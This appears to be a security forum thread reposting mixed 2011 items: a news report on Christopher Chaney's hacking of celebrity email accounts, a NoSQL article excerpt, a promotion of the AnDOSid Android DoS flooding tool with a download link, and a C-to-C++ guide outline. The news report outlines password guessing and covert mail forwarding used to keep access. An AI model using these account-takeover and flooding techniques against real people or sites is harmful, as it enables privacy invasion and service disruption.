Operation Hackerazzi : FBI arrests alleged Hacker for Stealing naked photos of Hollywood stars Posted by THN Reporter On 10/13/2011 02:10:00 PM FEDERAL officials on Wednesday arrested a 35-year-old Florida man,Christopher Chaney and charged him with 26 counts of cyber-related crimes against Hollywood stars following an 11-month federal probe dubbed "Operation Hackerazzi". Twitter was ablaze earlier today with messages claiming to link to naked pictures of film actress Scarlett Johansson, which were allegedly stolen from her iPhone by a hacker earlier this year.The photographs may or may not be of Scarlett Johansson, but I would suggest that every hot-blooded male exercises some restraint as it's extremely possible that cybercriminals might exploit the interest to post dangerous links on the web designed to infect computers or steal information. To gain access to these email accounts, Chaney would search through details of celebrity lives within magazines as well as social media accounts like Twitter and figure out possible passwords. Once Chaney cracked the password, he would setup email forwarding to send a duplicate version of all emails to his personal account. This allowed Chaney to continue receiving emails after the password was reset. Gaining access to one account also allowed Chaney to access the address book and discover more celebrity email addresses. Chaney faces 26 counts of identity theft, unauthorized access to a protected computer and wiretapping. If convicted on all counts, Chaney could receive 121 years in prison for his crimes. Chaney was released on a $10,000 bond earlier today, but several restrictions are in place for the hacker. Chaney isn't allowed access to any computer or other device with Internet access and travel is restricted to the Middle District of Florida and Central District of California for trial purposes. Sursa: http://thehackernews.com/2011/10/operation-hackerazzi-fbi-arrests.html

NoSQL Author: Greg Burd Choosing between databases used to boil down to examining the differences between the available commercial and open source relational databases. The term "database" had become synonymous with SQL, and for a while not much else came close to being a viable solution for data storage. But recently there has been a shift in the database landscape. When considering options for data storage, there is a new game in town: NoSQL databases. In this article I'll introduce this new category of databases, examine where they came from and what they are good for, and help you understand whether you, too, should be considering a NoSQL solution in place of, or in addition to, your RDBMS database. What Is NoSQL? The only thing that all NoSQL solutions providers generally agree on is that the term "NoSQL" isn't perfect, but it is catchy. Most agree that the "no" stands for "not only"—an admission that the goal is not to reject SQL but, rather, to compensate for the technical limitations shared by the majority of relational database implementations. In fact, NoSQL is more a rejection of a particular software and hardware architecture for databases than of any single technology, language, or product. Relational databases evolved in a different era with different technological constraints, leading to a design that was optimal for the typical deployment prevalent at that time. But times have changed, and that once successful design is now a limitation. You might hear conversations suggesting that a better term for this category is NoRDBMS or half a dozen other labels, but the critical thing to remember is that NoSQL solutions started off with a different set of goals and evolved in a different environment, and so they are operationally different and, arguably, provide bettersuited solutions for many of today's data storage problems. Articol: http://www.usenix.org/publications/login/2011-10/openpdfs/Burd.pdf

AnDOSid - DOS testing tool for Android The rise of groups like Anonymous and LuzSec, as well as constant India / Pakistan cyberwar has raised the issue of cyber-security high(er) in the minds of web owners. Security tools exist to simulate such attacks and help website security people defend against them, however for the most part they currently only exist for desktop computers. Mobile phones have, over the last few years, grown from simple devices that send and receive calls to mobile computing platforms which can be purchased for less than $100 a device. AnDOSid fills that gap, allowing security professionals to simulate a DOS attack (An http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. However it also transmits both the phones IMEI and the android ID to prevent it\'s use by malicious people. AnDOSid is designed for security professionals only! AnDOSid tag's posts with two unique numbers which relate to the Android device that sent the request. AnDOSid allows security professionals to simulate a DOS attack (A http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. AnDOSid is actively being developed and feedback is welcomed from the security community as to how you would like the application to evolve. SCOTT HERBERT Developed this Tool for Android and it is designed for Security Professionals/PenTesters. Some possible new features could include: A drop down list of recent targets User defined delay between posts An option for GET based testing And this tool can be downloaded from the below link which costs just 1L. https://market.android.com/details?id=com.scott.herbert.AnDOSid Sursa: http://www.computingtweaks.com/2011/10/andosid-dos-testing-tool-for-android.html

From C to C++: A quick reference for aging programmers So you were a great system programmer, back in the old days; your low level programs were celebrated by clever people, you loved C pointers and some days even considered Assembler as an option. You were happy and self-confident. But somehow you screwed something, got trapped in a time vortex and you ended today, trying to maintain or develop a program using that pesky Object Oriented Programming model in something called C++. I understand you; follow this guide and learn a bunch of things that will put you out of your misery and understand this brave new world. Structs Classes Encapsulation Constructors and destructors This Inheritance Virtual methods Overloading Function and method overloading Operator overloading References Exceptions Templates Other features Default values for function arguments New and delete See also Articol: http://triptico.com/docs/c2cpp.html

Nu am acces sa pot pune chat, iar de kwe nici eu nu prea mai dau. Lucram, ajungem acasa tarziu, si dupa 8 ore la munca in fata calculatorului nu iti mai vine sa stai inca 2-3 acasa, mai ales ca la munca cel putin iese un ban. Voi discuta cu kwe, cand dau de el.

Vom reveni.